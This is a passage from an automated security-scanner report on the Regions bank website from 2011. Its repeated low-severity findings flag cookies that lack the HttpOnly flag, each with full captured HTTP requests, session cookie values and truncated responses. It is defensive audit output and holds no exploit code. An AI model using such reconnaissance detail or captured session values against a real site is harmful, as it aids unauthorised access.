Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555382886:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Type: application/x-javascript
Last-Modified: Wed, 27 Apr 2011 18:40:58 GMT
Accept-Ranges: bytes
ETag: "0194a6a5cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:47 GMT
Content-Length: 73452

...//*********** jquery-1.4.2.min.js *******
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.aj
...[SNIP]...
8.104. http://www.regions.com/JS/loadMedia.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /JS/loadMedia.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /JS/loadMedia.js HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555439504:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Type: application/x-javascript
Last-Modified: Tue, 05 Apr 2011 17:51:58 GMT
Accept-Ranges: bytes
ETag: "0338d28baf3cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:26 GMT
Content-Length: 51756

...// (1) browser vendor:
// is_nav, is_firefox, is_ie, is_opera, is_hotjava, is_webtv, is_TVNavigator, is_AOLTV
// (2) browser version number:
// is_major (integer indicating major version
...[SNIP]...
8.105. http://www.regions.com/JS/loadMedia.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /JS/loadMedia.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /JS/loadMedia.min.js HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/online_banking_help.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555382886:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Type: application/x-javascript
Last-Modified: Tue, 05 Apr 2011 18:24:58 GMT
Accept-Ranges: bytes
ETag: "039b9c4bef3cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:47 GMT
Content-Length: 35261

...var agt=navigator.userAgent.toLowerCase();var is_major=parseInt(navigator.appVersion);var is_minor=parseFloat(navigator.appVersion);var is_nav=((agt.indexOf("mozilla")!=-1)&&(agt.indexOf("spoofer")
...[SNIP]...
8.106. http://www.regions.com/about_regions/IR_investorrelations.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /about_regions/IR_investorrelations.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_regions/IR_investorrelations.html HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/email_fraud.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557331806:ss=1305556924172

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Content-Type: text/html
Last-Modified: Fri, 25 Mar 2011 02:24:58 GMT
Accept-Ranges: bytes
ETag: "079e7d593eacb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:52:26 GMT
Content-Length: 612

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Typ
...[SNIP]...
8.107. http://www.regions.com/about_regions/company_info.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /about_regions/company_info.rf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_regions/company_info.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/wrapperHeader.aspx?p=477
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557549322:ss=1305556924172

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:52:53 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 18578


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
8.108. http://www.regions.com/about_regions/email_fraud.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /about_regions/email_fraud.rf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_regions/email_fraud.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/protecting_self_online.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557307425:ss=1305556924172

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:48:51 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 20870


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
8.109. http://www.regions.com/about_regions/privacy_security.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /about_regions/privacy_security.rf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_regions/privacy_security.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305556924172:ss=1305556924172

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:43:28 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 20511


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
8.110. http://www.regions.com/about_regions/protecting_self_online.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /about_regions/protecting_self_online.rf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_regions/protecting_self_online.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/report_fraud.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557020647:ss=1305556924172

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:48:15 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 23209


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
8.111. http://www.regions.com/about_regions/report_fraud.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /about_regions/report_fraud.rf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_regions/report_fraud.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/privacy_security.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557010832:ss=1305556924172

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:43:40 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 25489


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
8.112. http://www.regions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555412882:ss=1305555382886; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 3262
Content-Type: image/x-icon
Last-Modified: Tue, 21 Dec 2010 20:53:00 GMT
Accept-Ranges: bytes
ETag: "01e6fd51a1cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:20:08 GMT

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...
8.113. http://www.regions.com/img/arrowGray_Small.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /img/arrowGray_Small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/arrowGray_Small.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/loans_credit.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555436808:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 68
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:15 GMT

GIF89a.......VWQTTRVVXVVTUUUTTT......!.......,..........    Xf@V...V..;
8.114. http://www.regions.com/js/_bt.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /js/_bt.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/_bt.js HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/online_banking_help.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555382886:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Apr 2011 14:08:58 GMT
Accept-Ranges: bytes
ETag: "0b994a976fbcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:51 GMT
Content-Length: 990

//if bt_test is true before executing this script the iframe will load on uat
//
//if bt_extra is declared as an associative array before executing this script all members of the array will be added
...[SNIP]...
8.115. http://www.regions.com/js/wtbase.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /js/wtbase.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/wtbase.js HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/online_banking_help.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555382886:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Apr 2011 14:09:58 GMT
Accept-Ranges: bytes
ETag: "0ff57cd76fbcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:50 GMT
Content-Length: 13718

function DcsInit(){
   this.dcsid="dcs4b71fc10000gs8u88h5t1k_6n2i";
   this.domain="statse.webtrendslive.com";
   this.enabled=true;
   this.exre=(function(){
       if (window.RegExp){
           return(new RegExp(
...[SNIP]...
8.116. http://www.regions.com/personal_banking/email_starting_net.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /personal_banking/email_starting_net.rf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/email_starting_net.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/online_banking_help.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555429176:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:20:27 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 22072


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
8.117. http://www.regions.com/personal_banking/get_started_autoloan.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /personal_banking/get_started_autoloan.rf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/get_started_autoloan.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555463799:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:20:39 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 5948


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link
...[SNIP]...
8.118. http://www.regions.com/personal_banking/get_started_cds.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /personal_banking/get_started_cds.rf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/get_started_cds.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555448118:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:20:36 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 6313


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link
...[SNIP]...
8.119. http://www.regions.com/personal_banking/get_started_heloan.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /personal_banking/get_started_heloan.rf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/get_started_heloan.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555462492:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:20:39 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 5688


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link
...[SNIP]...
8.120. http://www.regions.com/personal_banking/get_started_heloc.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /personal_banking/get_started_heloc.rf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/get_started_heloc.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555457332:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
